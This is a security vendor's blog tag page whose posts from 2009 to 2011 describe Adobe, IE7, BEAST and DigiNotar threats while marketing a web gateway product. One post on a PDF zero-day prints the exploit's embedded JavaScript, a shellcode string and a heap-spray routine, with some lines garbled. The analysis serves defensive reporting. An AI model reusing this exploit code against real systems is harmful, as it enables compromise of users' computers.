Posts Tagged ‘SWG’

View All Vulnerabilities

A new Adobe 0-day In the Wild – – But No Worries, You are Already Protected with Our Secure Web Gateway!

By Anat Davidi  •  December 7th, 2011  •   Vulnerabilities

Yesterday Adobe released an advisory for a vulnerability in the Adobe Reader and Adobe Acrobat products. The vulnerability, titled ‘U3D Memory Corruption Vulnerability’ was part of a targeted attack and discovered by Lockheed Martin’s Computer Incident Response Team. This is not the first time a targeted attack has been aimed at the US defense industry.

This attack involves embedding a maliciously crafted Universal 3D (U3D) stream in a PDF file, one of several examples of attacks on embedded streams within PDF files, and represents a growing attack vector due to its ability to deal with defense mechanisms among which DEP and ASLR (two techniques meant to help prevent unauthorized code execution) using known techniques such as JIT Spraying.

According to Adobe’s blog post released alongside the advisory, Adobe is planning to release an update for Adobe Reader 9, the version targeted by this vulnerability, “no later than the week of December 12, 2011″. The rest of its supported versions will receive updates as part of their quarterly updates in January 2012.

M86 Secure Web Gateway, version 9.2 and above, provides zero-day protection against this attack, without requiring any further updates. Customers who wish to monitor the attack in their organization may look for attacks that are tagged with the “Adobe Universal 3D streams” block message.

We’re proud that our proactive rules block this new zero-day exploit and we’ll continue to work hard to provide this level of protection to our customers in the future.

Tags:    |    |    |    |    |    |  

View All General

The Beauty and the BEAST

By Avri Schneider  •  September 28th, 2011  •   General

Transport Layer Security – (TLS) is a protocol often used during HTTPS connections to secure web sites. For almost a decade, it has been known that TLS 1.0 was insecure and vulnerable to attack – primarily due to its usage of the Cipher Block Chaining (CBC) mode of operation.  TLS version 1.1 and then TLS version 1.2 have been designed to cope with this and other weaknesses.

The theoretical attack published by Gregory V. Bard back in April 2006 has been exploited (although not in the wild) and a proof-of-concept has been recently developed. Just a little over a week ago, researchers Thai Duong and Juliano Rizzo demonstrated their proof-of-concept called BEAST – Acronym for Browser Exploit Against SSL/TLS and a few days ago, published a blog post describing the attack in detail.

Even though Microsoft, Google, Mozilla and Opera have  already released information or fixes for this issue, it is surprising that Internet Explorer, Chrome, Firefox and Opera, all recent web browsers, had this vulnerability unpatched for this long – leaving many users vulnerable to the particular type of attack SSL was designed to protect against.

OpenSSL has implemented a workaround for this vulnerability since version 0.9.6d which was released in May 2002, however some browsers use the Network Security Services (NSS) library, which remained vulnerable to this attack.

The beauty is that the M86 Secure Web Gateway appliance in its default configuration provides zero-day protection against  this (and other) types of attack.

The complexity, time and cost of keeping all browsers in an organization patched against all the latest security threats highlights the importance of not relying solely on client-side security solutions.

Regardless of whether browsers behind the Secure Web Gateway get patched and how quickly that happens, they are protected behind M86 Security Secure Web Gateway.

Tags:  

View All General

DigiNotar Certificates Revoked Following Theft

By Anat Davidi  •  September 13th, 2011  •   General

Last year as we considered possible future threats, one of our predictions for 2011 thoughts turned to the use of stolen digital certificates becoming increasingly more common.  We envisioned malicious websites and applications being signed using stolen digital certificates and validated by products and applications that fail to keep up to date with these events. It appears that our predictions are becoming a reality as we begin to see more and more cases of stolen certificates.

Recently, certificates belonging to a Certification Authority by the name of DigiNotar were stolen.  These were used to issue hundreds of certificates, amongst them, a certificate for the domain *.google.com which was used to execute Man-in-the-Middle attacks against users of encrypted Google services.

Following this incident, companies such as Microsoft, Google and Mozilla have all taken action to protect their respective products.

M86 Security has issued a Security Update for our Secure Web Gateway product, moving the five stolen root certificates to the untrusted list:

 

  • DigiNotar Root CA
  • DigiNotar Root CA G2
  • DigiNotar PKIoverheid CA Overheid
  • DigiNotar PKIoverheid CA Organisatie – G2
  • DigiNotar PKIoverheid CA Overheid en Bedrijven

 

 

Given that some of these certificates are already being used in active attacks, customers are highly advised to install this update (M86 Security Update 120).

 

With the update installed, Secure Web Gateway clients will be protected against malicious files signed with certificates issued by this Certification Authority in an attempt to appear legit, as well as Man-in-the-Middle attacks against users of various encrypted services. These will be blocked for a digital certificate violation.

 

To verify that the update has been installed and to observe the changes to Secure Web Gateway’s digital certificates, customers may inspect the product’s web administration interface under Administration > System Settings > Digital Certificates.  Here customers will see the certificates removed from the “M86 Security Trusted Root CA”, which can now be found under “M86 Security Untrusted Publishers”.

 

Secure Web Gateway Digital Certificates - "M86 Security Untrusted Publishers" list contains the five DigiNotar certificates

 

M86 Security will continue to keep track of the situation and take actions as necessary to keep our customers safe.

Tags:    |  

View All Vulnerabilities

Finjan prevents 0-day exploit of Adobe Acrobat Reader and Flash player vulnerability

By Anonymous  •  July 23rd, 2009  •   Vulnerabilities

Finjan’s Malicious Code Research Center (MCRC) has detected yet another case of a 0-day attack “in the wild”. This time, hackers are exploiting a vulnerability (CVE-2009-1862) in Adobe Acrobat/Reader and Flash player. By exploiting this vulnerability, the hackers can download and execute malicious code on the victim’s PC. According to Adobe, an update will be available only on July 31, 2009; leaving end users’ PC in the mean time unprotected. 
As with the previous 0-day attacks we reported, Finjan’s unified Secure Web Gateway (SWG) successfully detected and prevented the attempt to exploit the vulnerability and to execute code. By utilizing its patented real-time content inspection technology, Finjan’s SWG proactively prevented the attack without any update. 
As discovered by the MCRC research, the attack is being used on compromised website containing a script tag that loads the exploit from a remote malicious server. The malicious script uses heap spray technique to load the attack Shellcode and than loads a malcrafted Flash file that triggers the vulnerability. 
Following is a code snippet of the malicious script: 
 
Another interesting aspect of this exploit is that the embedded Shellcode in the script loads an obfuscated executable. This simple obfuscation is done in order to evade detection by signature-based security products. The downloaded malicious executable creates a Trojan DLL named “wmimachine2.dll” and registers it as service on the victim’s PC. 
When posting the exploit on VirusTotal, we found that none of the 40 Anti-Virus products detected it as malicious. 
 
Posting the Malicious script ended with a similar result – no detection. 
 
Posting the Malicious flash file ended with the same result – no detection 
 
Posting the Obfuscated payload ended with the same result – no detection. 
When browsing to the compromised site serving the 0-day attack via Finjan’s unified secure web gateway, users are protected as can be seen below: 
 
Posted by Golan Yosef

Tags:    |    |    |    |    |  

View All Vulnerabilities

Finjan Prevents PDF Zero-Day Exploit “in the wild”

By Anonymous  •  February 24th, 2009  •   Vulnerabilities

Since December 2008, the security community has reported on 3 zero-day attacks. We at Finjan are pleased to announce that our brand new unified Secure Web Gateway, utilizing our patented active real-time content inspection technology, prevents all 3 attacks proactively – without the need for a product update. 
The new zero-day attack that just came out exploits a critical vulnerability in Adobe Acrobat Reader (PDF). This zero-day attack is known to be circulating on the web since last weekend. The malicious PDF exploits buffer overflow vulnerability in version 9.0 and earlier versions of the Adobe Reader application. 
This is not the first time we found abuse of PDF’s ability to include JavaScript code. In this case the JavaScript code is used for injecting Shellcode using the heap spraying technique. 

<>
stream var shellcode=unescape(“%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178
%u8bef%[REMOVED]%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%[REMOVED]
%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%
u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%[REMOVED]
%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32
%u6163%u636c%u652e%u6578%u4100″); bigblock = unescape(“%u0D0D%u0D0D”);
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.lengthfillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0×40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
endstream

At this point our active real-time content inspection technology kicks in: 
 
Although Adobe is about to release patch at beginning of March, Finjan’s new unified Secure Web Gateway users are already well protected. 
Posted by Vadim Pogulievsky

Tags:    |    |  

View All Vulnerabilities

Finjan prevents exploits for MS09-002 found “in the wild”

By Anonymous  •  February 24th, 2009  •   Vulnerabilities

As with the case of the IE7 zero-day exploit (CVE-2008-4844) that was disclosed in December 2008, Finjan’s active real-time content inspection technology also prevents attempts to exploit the recently patched IE7 vulnerability (MS09-002, CVE-2009-0075) without any product update – this is what we call Proactive Web Security. 
The exploit was detected and blocked by our patented active real-time content inspection technology. This technology inspected the incoming code and detected suspicious computer operations in real time. 
Following is a code snippet of the exploit we found “in the wild”: 
 
Below is shown how our product responds when a user is visiting a Webpage infected with this code. Obviously, a customer can opt to customize this message or to simply redirect the user to a different landing page. 
 
Stay safe! 
Posted By Golan Yosef

Tags:    |    |